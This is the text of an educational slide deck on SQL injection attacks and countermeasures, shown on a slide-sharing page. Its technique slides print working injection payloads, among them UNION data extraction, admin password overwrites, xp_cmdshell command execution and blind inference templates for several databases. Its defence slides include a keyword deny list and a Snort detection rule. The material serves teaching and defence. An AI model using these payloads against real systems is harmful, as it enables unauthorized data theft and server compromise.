Cade zvavanjanja saigf cybercrime &amp; security onlineCade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security onlineCade Zvavanjanja
 
Cade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade Zvavanjanja
 
Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cade Zvavanjanja
 
A case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaA case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaCade Zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Cade Zvavanjanja
 
Cloud computing & service level agreements
Cloud computing & service level agreementsCloud computing & service level agreements
Cloud computing & service level agreementsCade Zvavanjanja
 
Introduction to IT Security
Introduction to IT SecurityIntroduction to IT Security
Introduction to IT SecurityCade Zvavanjanja
 
Gainful Information Security 2012 services
Gainful Information Security 2012 servicesGainful Information Security 2012 services
Gainful Information Security 2012 servicesCade Zvavanjanja
 

Mais de Cade Zvavanjanja (10)

Cade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security onlineCade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security online
 
Cade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf online
 
comesa cybersecurity
comesa cybersecuritycomesa cybersecurity
comesa cybersecurity
 
Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1
 
A case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaA case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
 
Cloud computing & service level agreements
Cloud computing & service level agreementsCloud computing & service level agreements
Cloud computing & service level agreements
 
Introduction to IT Security
Introduction to IT SecurityIntroduction to IT Security
Introduction to IT Security
 
Gainful Information Security 2012 services
Gainful Information Security 2012 servicesGainful Information Security 2012 services
Gainful Information Security 2012 services
 
Top online frauds 2010
Top online frauds 2010Top online frauds 2010
Top online frauds 2010
 

Último

Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Último (20)

Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

Web application attacks using Sql injection and countermasures

  • 1. SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
  • 2. OUTLINE  Background of SQL Injection  Techniques and Examples  Preventing SQL Injection  Demo  Wrap-Up  Questions Introduction Background Techniques Prevention Demo Conclusions Questions
  • 3. BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 4. DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
  • 5. WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
  • 6. FLEXIBILITY = VULNERABILITY  Simple Injection  Decoding Error Messages  Blind Injection  Encoding Exploits  Stored Procedures ---  Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
  • 7. SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
  • 8. IMPORTANT SYMBOLS ‘  “Hack” --  “Comment Out” ;  “End Statement” %,*  “Wildcards”
  • 9. SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
  • 10. EXAMPLE: DATABASE SCHEMA  Table Users  Has columns “username” and “password”  Accessed when users log in  Table Customers  Has column “phone”  Users can look up other customer phone numbers by name  Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
  • 11. RETURNING EXTRA ROWS WITH “UNION”  Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’  Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
  • 12. MODIFYING RECORDS  Application has password changing page  SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’  Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
  • 13. MS SQL SERVER  Default SQL Server setup  Defaultsystem admin account “sa” enabled  No password!!!  Supports multiple queries  “Extended stored procedures”: C/C++ DLL files  Read/writeexternal files  Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
  • 14. EXPLOITING SQL SERVER  Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’  Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
  • 15. DATA-MINING WITH SQL INJECTION  Three classes of data-mining  In-band  Out-of-band  Inference
  • 16. IN-BAND ATTACKS  Data is included in response from the web server  Could be a well rendered web page  Using UNION SELECTS  Error messages
  • 17. OUT-OF-BAND ATTACKS  Data is retrieved using another communication channel:  UTL_HTTP.REQUEST  OPENROWSET  XP_SENDMAIL
  • 18. INFERENCE ATTACKS  At the core of inference is a question  Action taken based upon the answer  Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
  • 19. INFERENCE ATTACKS…CONT:  Examples:  Time Delay  Generate 200/500 responses  Response Variation  Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
  • 20. INFERENCE ATTACKS…CONT:  CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
  • 21. INFERENCE THROUGH WEB SERVER RESPONSE CODES  Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
  • 22. INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:  Notes:  Works well with SQL Server, Oracle, DB2  MySQL returns NULL  Informix ODBC driver returns 200 – even in event of error  Response code could be 302 Redirect, etc – principle is the same.  Leaves a large number of 500 response in log files  App Environments like PL/SQL will return 404 instead of 500
  • 23. INFERENCE THROUGH RESPONSE VARIATIONS:  Parameter Splitting and Balancing  Avoids 500 responses
  • 24. PARAMETER SPLITTING AND BALANCING  ‘NGSSOFTWARE’  ‘NGSSOFTWA’+’RE’  ‘NGSSOFTWA’||’RE’  ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’  ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’  2 1 +1  1 + (SUBSELECT RETURNS 1)
  • 25. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS  Cold Fusion Management  Converts “ to &quot;  Converts & to &amp;  Converts > to &gt;  Converts < to &lt;  Doubles up single quotes  Usually means attack vector is numeric input  PHP often doubles single quote – magic quotes
  • 26. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT:  Rather than > use BETWEEN X AND Y  Rather than & use ^ A xor BIT = C  if C is greater than A then Bit is not set  If C is less than A then Bit is set  Rather than ‘A’ use CHR(65)/CHAR(65)
  • 27. INFERENCE QUERIES…  SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
  • 28. INFERENCE QUERIES…  Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
  • 29. INFERENCE QUERIES…  Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
  • 30. INFERENCE QUERIES…  MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
  • 31. INFERENCE QUERIES…  MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
  • 32. INFERENCE QUERIES…  Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
  • 33. INFERENCE QUERIES…  Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
  • 34. PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 35. PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
  • 36. INPUT VALIDATION  Checks  Type  Size  Format  Range  Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
  • 37. INPUT CHECKING FUNCTIONS  Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
  • 38. ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
  • 39. USER PERMISSIONS  Limit query access rights  SELECT  UPDATE  DROP  Restricted statement access  Global-specific  Database-specific  Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
  • 40. VARIABLE PLACEHOLDERS (?)  Defense from String Concatenation  Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
  • 41. STORED PROCEDURES  Use error checking variables  Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
  • 42. DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 43. COUNTERMEASURES  System Administrators  White List / Blacklist Input Validation  Least Privileges  Application firewalls  Developer  StoredProcedures  Parameterized queries  Exception handling
  • 44. WHITELIST INPUT VALIDATION  UrlScan v3.0  restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;  SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i";  Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
  • 45. LEAST PRIVILEGES  Enforce least privileges  CREATE / DELETE  Does not guarantee security  Access to portion of data  Create views
  • 46. CONCLUSIONS  SQL Injection continues to evolve with new technologies  Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
  • 47. QUESTIONS  1) What could prevent the ‘Students’ table from being dropped?  2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
  • 48. REFERENCES  Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>.  Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.  "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.  Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.  Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
  • 49. Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: info@gis.co.zw cade@gis.co.zw Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions

Notas do Editor

  1. RFID virus uses MS SQL Server commands.
  2. PHP example
  3. May remove this slide
  4. http://sacs.ucf.edu/ccr/cct_welcome.asp
  5. What is WhiteList/Blacklist input validation - explain Choose whitelist over black list it much easier to accept valid states than it is to denythem
  6. This will not prevent SQL injection attack but it will minimize it. Create/Delete – you application will most likely never have to create and drop tables at runtime Elevation of privileges Views should only access data that is required for the application